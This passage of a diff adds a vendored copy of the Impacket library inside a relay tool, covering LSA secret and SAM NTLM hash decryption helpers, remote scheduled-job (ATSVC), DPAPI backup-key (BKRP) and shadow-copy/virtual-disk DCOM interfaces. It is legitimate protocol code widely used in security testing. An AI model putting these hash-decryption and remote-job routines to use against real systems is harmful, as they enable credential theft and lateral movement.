+        n = 1
+
+    if n > (pow(2,r)-1):
+        raise Exception("Error computing KDF_CounterMode")
+
+    result = b''
+    K      = b''
+
+    for i in range(1,n+1):
+       input = pack('>L', i) + Label + b'\x00' + Context + pack('>L',L)
+       K = hmac.new(KI, input, hashlib.sha256).digest()
+       result = result + K
+
+    return result[:(L//8)]
+
+# [MS-LSAD] Section 5.1.2 / 5.1.3
+class LSA_SECRET_XP(Structure):
+    structure = (
+        ('Length','<L=0'),
+        ('Version','<L=0'),
+        ('_Secret','_-Secret', 'self["Length"]'),
+        ('Secret', ':'),
+    )
+
+
+def transformKey(InputKey):
+    # Section 5.1.3
+    OutputKey = []
+    OutputKey.append( chr(ord(InputKey[0:1]) >> 0x01) )
+    OutputKey.append( chr(((ord(InputKey[0:1])&0x01)<<6) | (ord(InputKey[1:2])>>2)) )
+    OutputKey.append( chr(((ord(InputKey[1:2])&0x03)<<5) | (ord(InputKey[2:3])>>3)) )
+    OutputKey.append( chr(((ord(InputKey[2:3])&0x07)<<4) | (ord(InputKey[3:4])>>4)) )
+    OutputKey.append( chr(((ord(InputKey[3:4])&0x0F)<<3) | (ord(InputKey[4:5])>>5)) )
+    OutputKey.append( chr(((ord(InputKey[4:5])&0x1F)<<2) | (ord(InputKey[5:6])>>6)) )
+    OutputKey.append( chr(((ord(InputKey[5:6])&0x3F)<<1) | (ord(InputKey[6:7])>>7)) )
+    OutputKey.append( chr(ord(InputKey[6:7]) & 0x7F) )
+
+    for i in range(8):
+        OutputKey[i] = chr((ord(OutputKey[i]) << 1) & 0xfe)
+
+    return b("".join(OutputKey))
+
+def decryptSecret(key, value):
+    # [MS-LSAD] Section 5.1.2
+    plainText = b''
+    key0 = key
+    for i in range(0, len(value), 8):
+        cipherText = value[:8]
+        tmpStrKey = key0[:7]
+        tmpKey = transformKey(tmpStrKey)
+        Crypt1 = DES.new(tmpKey, DES.MODE_ECB)
+        plainText += Crypt1.decrypt(cipherText)
+        key0 = key0[7:]
+        value = value[8:]
+        # AdvanceKey
+        if len(key0) < 7:
+            key0 = key[len(key0):]
+
+    secret = LSA_SECRET_XP(plainText)
+    return (secret['Secret'])
+
+def encryptSecret(key, value):
+    # [MS-LSAD] Section 5.1.2
+    cipherText = b''
+    key0 = key
+    value0 = pack('<LL', len(value), 1) + value
+    for i in range(0, len(value0), 8):
+        if len(value0) < 8:
+            value0 = value0 + b'\x00'*(8-len(value0))
+        plainText = value0[:8]
+        tmpStrKey = key0[:7]
+        print(type(tmpStrKey))
+        print(tmpStrKey)
+        tmpKey = transformKey(tmpStrKey)
+        Crypt1 = DES.new(tmpKey, DES.MODE_ECB)
+        cipherText += Crypt1.encrypt(plainText)
+        key0 = key0[7:]
+        value0 = value0[8:]
+        # AdvanceKey
+        if len(key0) < 7:
+            key0 = key[len(key0):]
+
+    return cipherText
+
+def SamDecryptNTLMHash(encryptedHash, key):
+    # [MS-SAMR] Section 2.2.11.1.1
+    Block1 = encryptedHash[:8]
+    Block2 = encryptedHash[8:]
+
+    Key1 = key[:7]
+    Key1 = transformKey(Key1)
+    Key2 = key[7:14]
+    Key2 = transformKey(Key2)
+
+    Crypt1 = DES.new(Key1, DES.MODE_ECB)
+    Crypt2 = DES.new(Key2, DES.MODE_ECB)
+
+    plain1 = Crypt1.decrypt(Block1)
+    plain2 = Crypt2.decrypt(Block2)
+
+    return plain1 + plain2
+
+def SamEncryptNTLMHash(encryptedHash, key):
+    # [MS-SAMR] Section 2.2.11.1.1
+    Block1 = encryptedHash[:8]
+    Block2 = encryptedHash[8:]
+
+    Key1 = key[:7]
+    Key1 = transformKey(Key1)
+    Key2 = key[7:14]
+    Key2 = transformKey(Key2)
+
+    Crypt1 = DES.new(Key1, DES.MODE_ECB)
+    Crypt2 = DES.new(Key2, DES.MODE_ECB)
+
+    plain1 = Crypt1.encrypt(Block1)
+    plain2 = Crypt2.encrypt(Block2)
+
+    return plain1 + plain2

tools/MultiRelay/impacket-dev/impacket/dcerpc/__init__.py

@@ -0,0 +1 @@
+pass

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/__init__.py

@@ -0,0 +1 @@
+pass

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/atsvc.py

@@ -0,0 +1,211 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+#   [MS-TSCH] ATSVC Interface implementation
+#
+#   Best way to learn how to use these calls is to grab the protocol standard
+#   so you understand what the call does, and then read the test case located
+#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+#   Some calls have helper functions, which makes it even easier to use.
+#   They are located at the end of this file. 
+#   Helper functions start with "h"<name of the call>.
+#   There are test cases for them too. 
+#
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRPOINTER, NDRUniConformantArray
+from impacket.dcerpc.v5.dtypes import DWORD, LPWSTR, UCHAR, ULONG, LPDWORD, NULL
+from impacket import hresult_errors
+from impacket.uuid import uuidtup_to_bin
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+
+MSRPC_UUID_ATSVC  = uuidtup_to_bin(('1FF70682-0A51-30E8-076D-740BE8CEE98B','1.0'))
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__( self ):
+        key = self.error_code
+        if key in hresult_errors.ERROR_MESSAGES:
+            error_msg_short = hresult_errors.ERROR_MESSAGES[key][0]
+            error_msg_verbose = hresult_errors.ERROR_MESSAGES[key][1]
+            return 'TSCH SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'TSCH SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+ATSVC_HANDLE = LPWSTR
+# 2.3.1 Constant Values
+CNLEN = 15
+DNLEN = CNLEN
+UNLEN = 256
+MAX_BUFFER_SIZE = (DNLEN+UNLEN+1+1)
+
+# 2.3.7 Flags
+TASK_FLAG_INTERACTIVE                  = 0x1
+TASK_FLAG_DELETE_WHEN_DONE             = 0x2
+TASK_FLAG_DISABLED                     = 0x4
+TASK_FLAG_START_ONLY_IF_IDLE           = 0x10
+TASK_FLAG_KILL_ON_IDLE_END             = 0x20
+TASK_FLAG_DONT_START_IF_ON_BATTERIES   = 0x40
+TASK_FLAG_KILL_IF_GOING_ON_BATTERIES   = 0x80
+TASK_FLAG_RUN_ONLY_IF_DOCKED           = 0x100
+TASK_FLAG_HIDDEN                       = 0x200
+TASK_FLAG_RUN_IF_CONNECTED_TO_INTERNET = 0x400
+TASK_FLAG_RESTART_ON_IDLE_RESUME       = 0x800
+TASK_FLAG_SYSTEM_REQUIRED              = 0x1000
+TASK_FLAG_RUN_ONLY_IF_LOGGED_ON        = 0x2000
+
+################################################################################
+# STRUCTURES
+################################################################################
+# 2.3.4 AT_INFO
+class AT_INFO(NDRSTRUCT):
+    structure =  (
+        ('JobTime',DWORD),
+        ('DaysOfMonth',DWORD),
+        ('DaysOfWeek',UCHAR),
+        ('Flags',UCHAR),
+        ('Command',LPWSTR),
+    )
+
+class LPAT_INFO(NDRPOINTER):
+    referent = (
+        ('Data',AT_INFO),
+    )
+
+# 2.3.6 AT_ENUM
+class AT_ENUM(NDRSTRUCT):
+    structure =  (
+        ('JobId',DWORD),
+        ('JobTime',DWORD),
+        ('DaysOfMonth',DWORD),
+        ('DaysOfWeek',UCHAR),
+        ('Flags',UCHAR),
+        ('Command',LPWSTR),
+    )
+
+class AT_ENUM_ARRAY(NDRUniConformantArray):
+    item = AT_ENUM
+
+class LPAT_ENUM_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data',AT_ENUM_ARRAY),
+    )
+
+# 2.3.5 AT_ENUM_CONTAINER
+class AT_ENUM_CONTAINER(NDRSTRUCT):
+    structure =  (
+        ('EntriesRead',DWORD),
+        ('Buffer',LPAT_ENUM_ARRAY),
+    )
+
+################################################################################
+# RPC CALLS
+################################################################################
+# 3.2.5.2.1 NetrJobAdd (Opnum 0)
+class NetrJobAdd(NDRCALL):
+    opnum = 0
+    structure = (
+        ('ServerName',ATSVC_HANDLE),
+        ('pAtInfo', AT_INFO),
+    )
+
+class NetrJobAddResponse(NDRCALL):
+    structure = (
+        ('pJobId',DWORD),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.2.2 NetrJobDel (Opnum 1)
+class NetrJobDel(NDRCALL):
+    opnum = 1
+    structure = (
+        ('ServerName',ATSVC_HANDLE),
+        ('MinJobId', DWORD),
+        ('MaxJobId', DWORD),
+    )
+
+class NetrJobDelResponse(NDRCALL):
+    structure = (
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.2.3 NetrJobEnum (Opnum 2)
+class NetrJobEnum(NDRCALL):
+    opnum = 2
+    structure = (
+        ('ServerName',ATSVC_HANDLE),
+        ('pEnumContainer', AT_ENUM_CONTAINER),
+        ('PreferedMaximumLength', DWORD),
+        ('pResumeHandle', DWORD),
+    )
+
+class NetrJobEnumResponse(NDRCALL):
+    structure = (
+        ('pEnumContainer', AT_ENUM_CONTAINER),
+        ('pTotalEntries', DWORD),
+        ('pResumeHandle',LPDWORD),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.2.4 NetrJobGetInfo (Opnum 3)
+class NetrJobGetInfo(NDRCALL):
+    opnum = 3
+    structure = (
+        ('ServerName',ATSVC_HANDLE),
+        ('JobId', DWORD),
+    )
+
+class NetrJobGetInfoResponse(NDRCALL):
+    structure = (
+        ('ppAtInfo', LPAT_INFO),
+        ('ErrorCode',ULONG),
+    )
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+ 0 : (NetrJobAdd,NetrJobAddResponse ),
+ 1 : (NetrJobDel,NetrJobDelResponse ),
+ 2 : (NetrJobEnum,NetrJobEnumResponse ),
+ 3 : (NetrJobGetInfo,NetrJobGetInfoResponse ),
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+def hNetrJobAdd(dce, serverName = NULL, atInfo = NULL):
+    netrJobAdd = NetrJobAdd()
+    netrJobAdd['ServerName'] = serverName
+    netrJobAdd['pAtInfo'] = atInfo
+    return dce.request(netrJobAdd)
+
+def hNetrJobDel(dce, serverName = NULL, minJobId = 0, maxJobId = 0):
+    netrJobDel = NetrJobDel()
+    netrJobDel['ServerName'] = serverName
+    netrJobDel['MinJobId'] = minJobId
+    netrJobDel['MaxJobId'] = maxJobId
+    return dce.request(netrJobDel)
+
+def hNetrJobEnum(dce, serverName = NULL, pEnumContainer = NULL, preferedMaximumLength = 0xffffffff):
+    netrJobEnum = NetrJobEnum()
+    netrJobEnum['ServerName'] = serverName
+    netrJobEnum['pEnumContainer']['Buffer'] = pEnumContainer
+    netrJobEnum['PreferedMaximumLength'] = preferedMaximumLength
+    return dce.request(netrJobEnum)
+
+def hNetrJobGetInfo(dce, serverName = NULL, jobId = 0):
+    netrJobGetInfo = NetrJobGetInfo()
+    netrJobGetInfo['ServerName'] = serverName
+    netrJobGetInfo['JobId'] = jobId
+    return dce.request(netrJobGetInfo)

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/bkrp.py

@@ -0,0 +1,127 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+#   [MS-BKRP] Interface implementation
+#
+#   Best way to learn how to use these calls is to grab the protocol standard
+#   so you understand what the call does, and then read the test case located
+#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+#   Some calls have helper functions, which makes it even easier to use.
+#   They are located at the end of this file. 
+#   Helper functions start with "h"<name of the call>.
+#   There are test cases for them too. 
+#
+# ToDo:
+# [ ] 2.2.2 Client-Side-Wrapped Secret
+from __future__ import division
+from __future__ import print_function
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRPOINTER, NDRUniConformantArray
+from impacket.dcerpc.v5.dtypes import DWORD, NTSTATUS, GUID, RPC_SID, NULL
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket import system_errors
+from impacket.uuid import uuidtup_to_bin, string_to_bin
+from impacket.structure import Structure
+
+MSRPC_UUID_BKRP = uuidtup_to_bin(('3dde7c30-165d-11d1-ab8f-00805f14db40', '1.0'))
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__( self ):
+        key = self.error_code
+        if key in system_errors.ERROR_MESSAGES:
+            error_msg_short = system_errors.ERROR_MESSAGES[key][0]
+            error_msg_verbose = system_errors.ERROR_MESSAGES[key][1] 
+            return 'BKRP SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'BKRP SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+
+BACKUPKEY_BACKUP_GUID = string_to_bin("7F752B10-178E-11D1-AB8F-00805F14DB40")
+BACKUPKEY_RESTORE_GUID_WIN2K = string_to_bin("7FE94D50-178E-11D1-AB8F-00805F14DB40")
+BACKUPKEY_RETRIEVE_BACKUP_KEY_GUID = string_to_bin("018FF48A-EABA-40C6-8F6D-72370240E967")
+BACKUPKEY_RESTORE_GUID =  string_to_bin("47270C64-2FC7-499B-AC5B-0E37CDCE899A")
+
+################################################################################
+# STRUCTURES
+################################################################################
+class BYTE_ARRAY(NDRUniConformantArray):
+    item = 'c'
+
+class PBYTE_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data', BYTE_ARRAY),
+    )
+
+# 2.2.4.1 Rc4EncryptedPayload Structure
+class Rc4EncryptedPayload(Structure):
+    structure = (
+        ('R3', '32s=""'),
+        ('MAC', '20s=""'),
+        ('SID', ':', RPC_SID),
+        ('Secret', ':'),
+    )
+
+# 2.2.4 Secret Wrapped with Symmetric Key
+class WRAPPED_SECRET(Structure):
+    structure = (
+        ('SIGNATURE', '<L=1'),
+        ('Payload_Length', '<L=0'),
+        ('Ciphertext_Length', '<L=0'),
+        ('GUID_of_Wrapping_Key', '16s=""'),
+        ('R2', '68s=""'),
+        ('_Rc4EncryptedPayload', '_-Rc4EncryptedPayload', 'self["Payload_Length"]'),
+        ('Rc4EncryptedPayload', ':'),
+    )
+
+################################################################################
+# RPC CALLS
+################################################################################
+# 3.1.4.1 BackuprKey(Opnum 0)
+class BackuprKey(NDRCALL):
+    opnum = 0
+    structure = (
+       ('pguidActionAgent', GUID),
+       ('pDataIn', BYTE_ARRAY),
+       ('cbDataIn', DWORD),
+       ('dwParam', DWORD),
+    )
+
+class BackuprKeyResponse(NDRCALL):
+    structure = (
+       ('ppDataOut', PBYTE_ARRAY),
+       ('pcbDataOut', DWORD),
+       ('ErrorCode', NTSTATUS),
+    )
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+ 0 : (BackuprKey, BackuprKeyResponse),
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+def hBackuprKey(dce, pguidActionAgent, pDataIn, dwParam=0):
+    request = BackuprKey()
+    request['pguidActionAgent'] = pguidActionAgent
+    request['pDataIn'] = pDataIn
+    if pDataIn == NULL:
+        request['cbDataIn'] = 0
+    else:
+        request['cbDataIn'] = len(pDataIn)
+    request['dwParam'] = dwParam
+    return dce.request(request)

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcom/__init__.py

@@ -0,0 +1 @@
+pass

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcom/scmp.py

@@ -0,0 +1,337 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+#   [MS-SCMP]: Shadow Copy Management Protocol Interface implementation
+#              This was used as a way to test the DCOM runtime. Further 
+#              testing is needed to verify it is working as expected
+#
+#   Best way to learn how to use these calls is to grab the protocol standard
+#   so you understand what the call does, and then read the test case located
+#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+#   Since DCOM is like an OO RPC, instead of helper functions you will see the 
+#   classes described in the standards developed. 
+#   There are test cases for them too. 
+#
+from __future__ import division
+from __future__ import print_function
+from impacket.dcerpc.v5.ndr import NDRENUM, NDRSTRUCT, NDRUNION
+from impacket.dcerpc.v5.dcomrt import PMInterfacePointer, INTERFACE, DCOMCALL, DCOMANSWER, IRemUnknown2
+from impacket.dcerpc.v5.dtypes import LONG, LONGLONG, ULONG, WSTR
+from impacket.dcerpc.v5.enum import Enum
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket import hresult_errors
+from impacket.uuid import string_to_bin
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__( self ):
+        if self.error_code in hresult_errors.ERROR_MESSAGES:
+            error_msg_short = hresult_errors.ERROR_MESSAGES[self.error_code][0]
+            error_msg_verbose = hresult_errors.ERROR_MESSAGES[self.error_code][1] 
+            return 'SCMP SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'SCMP SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+# 1.9 Standards Assignments
+CLSID_ShadowCopyProvider = string_to_bin('0b5a2c52-3eb9-470a-96e2-6c6d4570e40f')
+IID_IVssSnapshotMgmt = string_to_bin('FA7DF749-66E7-4986-A27F-E2F04AE53772')
+IID_IVssEnumObject   = string_to_bin('AE1C7110-2F60-11d3-8A39-00C04F72D8E3')
+IID_IVssDifferentialSoftwareSnapshotMgmt = string_to_bin('214A0F28-B737-4026-B847-4F9E37D79529')
+IID_IVssEnumMgmtObject = string_to_bin('01954E6B-9254-4e6e-808C-C9E05D007696')
+IID_ShadowCopyProvider = string_to_bin('B5946137-7B9F-4925-AF80-51ABD60B20D5')
+
+# 2.2.1.1 VSS_ID
+class VSS_ID(NDRSTRUCT):
+    structure = (
+        ('Data','16s=b""'),
+    )
+
+    def getAlignment(self):
+        return 2
+
+#2.2.1.2 VSS_PWSZ
+VSS_PWSZ = WSTR
+
+# 2.2.1.3 VSS_TIMESTAMP
+VSS_TIMESTAMP = LONGLONG
+
+error_status_t = LONG
+################################################################################
+# STRUCTURES
+################################################################################
+# 2.2.2.1 VSS_OBJECT_TYPE Enumeration
+class VSS_OBJECT_TYPE(NDRENUM):
+    class enumItems(Enum):
+        VSS_OBJECT_UNKNOWN      = 0
+        VSS_OBJECT_NONE         = 1
+        VSS_OBJECT_SNAPSHOT_SET = 2
+        VSS_OBJECT_SNAPSHOT     = 3
+        VSS_OBJECT_PROVIDER     = 4
+        VSS_OBJECT_TYPE_COUNT   = 5
+
+# 2.2.2.2 VSS_MGMT_OBJECT_TYPE Enumeration
+class VSS_MGMT_OBJECT_TYPE(NDRENUM):
+    class enumItems(Enum):
+        VSS_MGMT_OBJECT_UNKNOWN     = 0
+        VSS_MGMT_OBJECT_VOLUME      = 1
+        VSS_MGMT_OBJECT_DIFF_VOLUME = 2
+        VSS_MGMT_OBJECT_DIFF_AREA   = 3
+
+# 2.2.2.3 VSS_VOLUME_SNAPSHOT_ATTRIBUTES Enumeration
+class VSS_VOLUME_SNAPSHOT_ATTRIBUTES(NDRENUM):
+    class enumItems(Enum):
+        VSS_VOLSNAP_ATTR_PERSISTENT        = 0x01
+        VSS_VOLSNAP_ATTR_NO_AUTORECOVERY   = 0x02
+        VSS_VOLSNAP_ATTR_CLIENT_ACCESSIBLE = 0x04
+        VSS_VOLSNAP_ATTR_NO_AUTO_RELEASE   = 0x08
+        VSS_VOLSNAP_ATTR_NO_WRITERS        = 0x10
+
+# 2.2.2.4 VSS_SNAPSHOT_STATE Enumeration
+class VSS_SNAPSHOT_STATE(NDRENUM):
+    class enumItems(Enum):
+        VSS_SS_UNKNOWN  = 0x01
+        VSS_SS_CREATED  = 0x0c
+
+# 2.2.2.5 VSS_PROVIDER_TYPE Enumeration
+class  VSS_PROVIDER_TYPE(NDRENUM):
+    class enumItems(Enum):
+        VSS_PROV_UNKNOWN  = 0
+
+# 2.2.3.7 VSS_VOLUME_PROP Structure
+class VSS_VOLUME_PROP(NDRSTRUCT):
+    structure = (
+        ('m_pwszVolumeName', VSS_PWSZ),
+        ('m_pwszVolumeDisplayName', VSS_PWSZ),
+    )
+
+# 2.2.3.5 VSS_MGMT_OBJECT_UNION Union
+class VSS_MGMT_OBJECT_UNION(NDRUNION):
+    commonHdr = (
+        ('tag', ULONG),
+    )
+    union = {
+        VSS_MGMT_OBJECT_TYPE.VSS_MGMT_OBJECT_VOLUME: ('Vol', VSS_VOLUME_PROP),
+        #VSS_MGMT_OBJECT_DIFF_VOLUME: ('DiffVol', VSS_DIFF_VOLUME_PROP),
+        #VSS_MGMT_OBJECT_DIFF_AREA: ('DiffArea', VSS_DIFF_AREA_PROP),
+    }
+
+# 2.2.3.6 VSS_MGMT_OBJECT_PROP Structure
+class VSS_MGMT_OBJECT_PROP(NDRSTRUCT):
+    structure = (
+        ('Type', VSS_MGMT_OBJECT_TYPE),
+        ('Obj', VSS_MGMT_OBJECT_UNION),
+    )
+
+################################################################################
+# RPC CALLS
+################################################################################
+# 3.1.3 IVssEnumMgmtObject Details
+
+# 3.1.3.1 Next (Opnum 3)
+class IVssEnumMgmtObject_Next(DCOMCALL):
+    opnum = 3
+    structure = (
+       ('celt', ULONG),
+    )
+
+class IVssEnumMgmtObject_NextResponse(DCOMANSWER):
+    structure = (
+       ('rgelt', VSS_MGMT_OBJECT_PROP),
+       ('pceltFetched', ULONG),
+       ('ErrorCode', error_status_t),
+    )
+
+# 3.1.2.1 Next (Opnum 3)
+class IVssEnumObject_Next(DCOMCALL):
+    opnum = 3
+    structure = (
+       ('celt', ULONG),
+    )
+
+class IVssEnumObject_NextResponse(DCOMANSWER):
+    structure = (
+       ('rgelt', VSS_MGMT_OBJECT_PROP),
+       ('pceltFetched', ULONG),
+       ('ErrorCode', error_status_t),
+    )
+
+class GetProviderMgmtInterface(DCOMCALL):
+    opnum = 3
+    structure = (
+       ('ProviderId', VSS_ID),
+       ('InterfaceId', VSS_ID),
+    )
+
+class GetProviderMgmtInterfaceResponse(DCOMANSWER):
+    structure = (
+       ('ppItf', PMInterfacePointer),
+       ('ErrorCode', error_status_t),
+    )
+
+class QueryVolumesSupportedForSnapshots(DCOMCALL):
+    opnum = 4
+    structure = (
+       ('ProviderId', VSS_ID),
+       ('IContext', LONG),
+    )
+
+class QueryVolumesSupportedForSnapshotsResponse(DCOMANSWER):
+    structure = (
+       ('ppEnum', PMInterfacePointer),
+       ('ErrorCode', error_status_t),
+    )
+
+class QuerySnapshotsByVolume(DCOMCALL):
+    opnum = 5
+    structure = (
+       ('pwszVolumeName', VSS_PWSZ),
+       ('ProviderId', VSS_ID),
+    )
+
+class QuerySnapshotsByVolumeResponse(DCOMANSWER):
+    structure = (
+       ('ppEnum', PMInterfacePointer),
+       ('ErrorCode', error_status_t),
+    )
+
+# 3.1.4.4.5 QueryDiffAreasForVolume (Opnum 6)
+class QueryDiffAreasForVolume(DCOMCALL):
+    opnum = 6
+    structure = (
+       ('pwszVolumeName', VSS_PWSZ),
+    )
+
+class QueryDiffAreasForVolumeResponse(DCOMANSWER):
+    structure = (
+       ('ppEnum', PMInterfacePointer),
+       ('ErrorCode', error_status_t),
+    )
+
+# 3.1.4.4.6 QueryDiffAreasOnVolume (Opnum 7)
+class QueryDiffAreasOnVolume(DCOMCALL):
+    opnum = 7
+    structure = (
+       ('pwszVolumeName', VSS_PWSZ),
+    )
+
+class QueryDiffAreasOnVolumeResponse(DCOMANSWER):
+    structure = (
+       ('ppEnum', PMInterfacePointer),
+       ('ErrorCode', error_status_t),
+    )
+
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+}
+
+################################################################################
+# HELPER FUNCTIONS AND INTERFACES
+################################################################################
+class IVssEnumMgmtObject(IRemUnknown2):
+    def __init__(self, interface):
+        IRemUnknown2.__init__(self, interface)
+        self._iid = IID_IVssEnumMgmtObject
+
+    def Next(self, celt):
+        request = IVssEnumMgmtObject_Next()
+        request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+        request['ORPCthis']['flags'] = 0
+        request['celt'] = celt
+        resp = self.request(request, self._iid, uuid = self.get_iPid())
+        return resp 
+
+class IVssEnumObject(IRemUnknown2):
+    def __init__(self, interface):
+        IRemUnknown2.__init__(self, interface)
+        self._iid = IID_IVssEnumObject
+
+    def Next(self, celt):
+        request = IVssEnumObject_Next()
+        request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+        request['ORPCthis']['flags'] = 0
+        request['celt'] = celt
+        dce = self.connect()
+        resp = dce.request(request, self._iid, uuid = self.get_iPid())
+        return resp 
+
+class IVssSnapshotMgmt(IRemUnknown2):
+    def __init__(self, interface):
+        IRemUnknown2.__init__(self, interface)
+        self._iid = IID_IVssSnapshotMgmt
+
+    def GetProviderMgmtInterface(self, providerId = IID_ShadowCopyProvider, interfaceId = IID_IVssDifferentialSoftwareSnapshotMgmt):
+        req = GetProviderMgmtInterface()
+        classInstance = self.get_cinstance()
+        req['ORPCthis'] = classInstance.get_ORPCthis()
+        req['ORPCthis']['flags'] = 0
+        req['ProviderId'] = providerId
+        req['InterfaceId'] = interfaceId
+        resp = self.request(req, self._iid, uuid = self.get_iPid())
+        return IVssDifferentialSoftwareSnapshotMgmt(INTERFACE(classInstance, ''.join(resp['ppItf']['abData']), self.get_ipidRemUnknown(), target = self.get_target()))
+
+    def QueryVolumesSupportedForSnapshots(self, providerId, iContext):
+        req = QueryVolumesSupportedForSnapshots()
+        classInstance = self.get_cinstance()
+        req['ORPCthis'] = classInstance.get_ORPCthis()
+        req['ORPCthis']['flags'] = 0
+        req['ProviderId'] = providerId
+        req['IContext'] = iContext
+        resp = self.request(req, self._iid, uuid = self.get_iPid())
+        return IVssEnumMgmtObject(INTERFACE(self.get_cinstance(), ''.join(resp['ppEnum']['abData']), self.get_ipidRemUnknown(),target = self.get_target()))
+
+    def QuerySnapshotsByVolume(self, volumeName, providerId = IID_ShadowCopyProvider):
+        req = QuerySnapshotsByVolume()
+        classInstance = self.get_cinstance()
+        req['ORPCthis'] = classInstance.get_ORPCthis()
+        req['ORPCthis']['flags'] = 0
+        req['pwszVolumeName'] = volumeName
+        req['ProviderId'] = providerId
+        try:
+            resp = self.request(req, self._iid, uuid = self.get_iPid())
+        except DCERPCException as e:
+            print(e)
+            from impacket.winregistry import hexdump
+            data = e.get_packet()
+            hexdump(data)
+            kk = QuerySnapshotsByVolumeResponse(data)
+            kk.dump()
+        #resp.dump()
+        return IVssEnumObject(INTERFACE(self.get_cinstance(), ''.join(resp['ppEnum']['abData']), self.get_ipidRemUnknown(), target = self.get_target()))
+
+class IVssDifferentialSoftwareSnapshotMgmt(IRemUnknown2):
+    def __init__(self, interface):
+        IRemUnknown2.__init__(self, interface)
+        self._iid = IID_IVssDifferentialSoftwareSnapshotMgmt
+
+    def QueryDiffAreasOnVolume(self, pwszVolumeName):
+        req = QueryDiffAreasOnVolume()
+        classInstance = self.get_cinstance()
+        req['ORPCthis'] = classInstance.get_ORPCthis()
+        req['ORPCthis']['flags'] = 0
+        req['pwszVolumeName'] = pwszVolumeName
+        resp = self.request(req, self._iid, uuid = self.get_iPid())
+        return IVssEnumMgmtObject(INTERFACE(self.get_cinstance(), ''.join(resp['ppEnum']['abData']), self.get_ipidRemUnknown(), target = self.get_target()))
+
+    def QueryDiffAreasForVolume(self, pwszVolumeName):
+        req = QueryDiffAreasForVolume()
+        classInstance = self.get_cinstance()
+        req['ORPCthis'] = classInstance.get_ORPCthis()
+        req['ORPCthis']['flags'] = 0
+        req['pwszVolumeName'] = pwszVolumeName
+        resp = self.request(req, self._iid, uuid = self.get_iPid())
+        return IVssEnumMgmtObject(INTERFACE(self.get_cinstance(), ''.join(resp['ppEnum']['abData']), self.get_ipidRemUnknown(), target = self.get_target()))

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcom/vds.py

@@ -0,0 +1,267 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+#   [MS-VDS]: Virtual Disk Service (VDS) Protocol
+#             This was used as a way to test the DCOM runtime. Further 
+#             testing is needed to verify it is working as expected
+#
+#   Best way to learn how to use these calls is to grab the protocol standard
+#   so you understand what the call does, and then read the test case located
+#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+#   Since DCOM is like an OO RPC, instead of helper functions you will see the 
+#   classes described in the standards developed. 
+#   There are test cases for them too. 
+#
+from __future__ import division
+from __future__ import print_function
+from impacket.dcerpc.v5.ndr import NDRSTRUCT, NDRUniConformantVaryingArray, NDRENUM
+from impacket.dcerpc.v5.dcomrt import DCOMCALL, DCOMANSWER, IRemUnknown2, PMInterfacePointer, INTERFACE
+from impacket.dcerpc.v5.dtypes import LPWSTR, ULONG, DWORD, SHORT, GUID
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket.dcerpc.v5.enum import Enum
